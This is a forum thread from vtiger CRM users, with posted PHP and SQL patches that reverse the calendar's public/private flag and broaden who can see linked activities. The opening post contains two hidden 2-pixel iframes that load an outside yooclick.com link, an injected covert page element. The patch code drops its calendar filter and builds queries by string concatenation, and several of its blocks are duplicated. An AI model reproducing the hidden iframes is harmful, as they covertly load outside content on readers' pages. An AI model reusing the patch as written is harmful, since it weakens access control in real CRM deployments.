In sharing access, Calendar is listed as private, but when you edit the modules, calendar is no longer listed so you can't change the access for it. Is there any way to set the calendar as public? <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>; <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>;
Comments
here are the bullet points of how this fix works;
- the public check box on events is reversed to private. default is public for events & tasks.
- if a user has permission to view a record they can view/edit/delete all tasks & events that are not marked private (see 1st bullet point)
- in the calendar module under all events & todos, a user can only see events & tasks from other users that have shared their calender and not marked the event private.
here are the code mods
****************************
modify getrelatedlistview function, line 84 in include/relatedlistview.php
original code:
if($is_admin==false && $profileglobalpermission[1] == 1 && $profileglobalpermission[2] == 1 && $defaultorgsharingpermission[$tab_id] == 3){
$sec_parameter=getlistviewsecurityparameter($relatedmodule);
$query .= ' '.$sec_parameter;
}
modified code:
if($is_admin==false && $profileglobalpermission[1] == 1 && $profileglobalpermission[2] == 1 && $defaultorgsharingpermission[$tab_id] == 3){
// cw - don't apply sharing restrictions to calendar items - shows all incomplete activities
if($relatedmodule == "calendar") //cw
$sec_parameter = ' and (vtiger_activity.visibility != "public" or vtiger_crmentity.smownerid = '.$current_user->id.')'; // cw
else { // cw
$sec_parameter=getlistviewsecurityparameter($relatedmodule); // cw - original line to apply sharing permissions
$query .= ' '.$sec_parameter;
}
this affects all incomplete activities in a record detailview.
******************************
modify gethistory function, line 456 in include/relatedlistview.php
original code:
$sec_parameter=getlistviewsecurityparameter('calendar');
modified code:
$sec_parameter=' and (vtiger_activity.visibility != "public" or vtiger_crmentity.smownerid = '.$current_user->id.')';
this affects all completed activities in a record detailview.
*******************************
modify ispermitted function, line 755 in include/utils/userinfoutil.php
original code:
$permission = "no";
if($module == 'users' || $module == 'home' || $module == 'uploads')
modified code: insert the code snippet
$permission = "no";
// cw - create special check for calendars - if entity that activity is attached to is shared then calendar should be shared - allows viewing & editing
if($module == 'calendar' && is_numeric($record_id)) { // cw
$sql = 'select se.crmid as id, e.setype from vtiger_seactivityrel se join vtiger_crmentity e on e.crmid = se.crmid and e.deleted=0 where se.activityid = '.$record_id. //cw
' union all select contactid as id, "contacts" as setype from vtiger_cntactivityrel where activityid = '.$record_id; // cw
$rsl = mysql_query($sql); // cw
while($data = mysql_fetch_array($rsl)) { //cw
// cw - if any entity attached to activity has view permission then show the activity
if(ispermitted($data["setype"], "detailview", $data["id"]) == "yes") // cw
return "yes"; // cw
} // cw - while
} // cw - if($module - end code addition
if($module == 'users' || $module == 'home' || $module == 'uploads')
this allows a user that has permission to see a record the permission to see the activities linked to the record
*********************************
modify getlistviewsecurityparameter, in include/utils/userinfoutil.php
original code:
$condition = " or (vtiger_crmentity.smownerid in($shared_ids) and vtiger_activity.visibility = 'public')";
modified code:
$condition = " or (vtiger_crmentity.smownerid in($shared_ids) and vtiger_activity.visibility != 'public')";
this reverses the use of the public check box on events
**********************************
modify getseclistviewsecurityparameter, in include/utils/userinfoutil.php
original code:
$condition = " or (vtiger_crmentity$module.smownerid in($shared_ids) and vtiger_activity.visibility = 'public')";
modified code:
$condition = " or (vtiger_crmentity$module.smownerid in($shared_ids) and vtiger_activity.visibility != 'public')";
this reverses the use of the public check box on events
**********************************
modify iscalendarpermittedbysharing, in include/utils/userinfoutil.php
original code:
$query = "select * from vtiger_sharedcalendar where userid in(select smownerid from vtiger_activity inner join vtiger_crmentity on vtiger_crmentity.crmid=vtiger_activity.activityid where activityid=? and visibility='public' and smownerid !=0) and sharedid=?";
modified code:
$query = "select * from vtiger_sharedcalendar where userid in(select smownerid from vtiger_activity inner join vtiger_crmentity on vtiger_crmentity.crmid=vtiger_activity.activityid where activityid=? and visibility!='public' and smownerid !=0) and sharedid=?";
this reverses the use of the public check box on events
***********************************
modify the language label in modules/calendar/language/en_us.lang.php
'lbl_public'=>'mark private'
this changes the check box so it says mark private instead of mark public
***********************************
to the vtiger team, thanks for working on a great product. i won't speak for everyone, but most organizations share information between people. anyone that has permission to view a record (contact, potential, account, etc) should also be able to see the activity related to that record unless explicitly marked private. with the mods above a user cannot see every activity on another users calendar. they can only see activities linked to records that they have permission to work on. i hope you will consider incorporating something like this into future versions.
colin.
**********************************
modify iscalendarpermittedbysharing, in include/utils/userinfoutil.php
original code:
$query = "select * from vtiger_sharedcalendar where userid in(select smownerid from vtiger_activity inner join vtiger_crmentity on vtiger_crmentity.crmid=vtiger_activity.activityid where activityid=? and visibility='public' and smownerid !=0) and sharedid=?";
modified code:
$query = "select * from vtiger_sharedcalendar where userid in(select smownerid from vtiger_activity inner join vtiger_crmentity on vtiger_crmentity.crmid=vtiger_activity.activityid where activityid=? and visibility!='public' and smownerid !=0) and sharedid=?";
this reverses the use of the public check box on events
***********************************
i cant see difference between original and modified code. can you help me?
visibility='public'
changes to
visibility!='public'
what this does is treat anything marked as public in the database as private. this seemed more intuitive for a crm. everything is public by default and you can make it private by checking a box. it is unlikely that people remember to check public on every action they enter.
""
modify getrelatedlistview function, line 84 in include/relatedlistview.php
original code:
if($is_admin==false && $profileglobalpermission[1] == 1 && $profileglobalpermission[2] == 1 && $defaultorgsharingpermission[$tab_id] == 3){
$sec_parameter=getlistviewsecurityparameter($relatedmodule);
$query .= ' '.$sec_parameter;
}
modified code:
if($is_admin==false && $profileglobalpermission[1] == 1 && $profileglobalpermission[2] == 1 && $defaultorgsharingpermission[$tab_id] == 3){
// cw - don't apply sharing restrictions to calendar items - shows all incomplete activities
if($relatedmodule == "calendar") //cw
$sec_parameter = ' and (vtiger_activity.visibility != "public" or vtiger_crmentity.smownerid = '.$current_user->id.')'; // cw
else { // cw
$sec_parameter=getlistviewsecurityparameter($relatedmodule); // cw - original line to apply sharing permissions
$query .= ' '.$sec_parameter;
}
"""
when i delete this mod i can login fine
can you help me?
p.s.. i try to clean smarty/templates_c cache but the issue remain
so instead of
if($is_admin==false && $profileglobalpermission[1] == 1 && $profileglobalpermission[2] == 1 && $defaultorgsharingpermission[$tab_id] == 3){
// cw - don't apply sharing restrictions to calendar items - shows all incomplete activities
if($relatedmodule == "calendar") //cw
$sec_parameter = ' and (vtiger_activity.visibility != "public" or vtiger_crmentity.smownerid = '.$current_user->id.')'; // cw
else { // cw
$sec_parameter=getlistviewsecurityparameter($relatedmodule); // cw - original line to apply sharing permissions
$query .= ' '.$sec_parameter;
}
the code has to be
if($is_admin==false && $profileglobalpermission[1] == 1 && $profileglobalpermission[2] == 1 && $defaultorgsharingpermission[$tab_id] == 3){
// cw - don't apply sharing restrictions to calendar items - shows all incomplete activities
if($relatedmodule == "calendar") //cw
$sec_parameter = ' and (vtiger_activity.visibility != "public" or vtiger_crmentity.smownerid = '.$current_user->id.')'; // cw
else { // cw
$sec_parameter=getlistviewsecurityparameter($relatedmodule); // cw - original line to apply sharing permissions
$query .= ' '.$sec_parameter;
}
}
without actually having started to use vtiger in our daily routine i feel this is a prerequisite for a smoothly running, collaborative system.
rob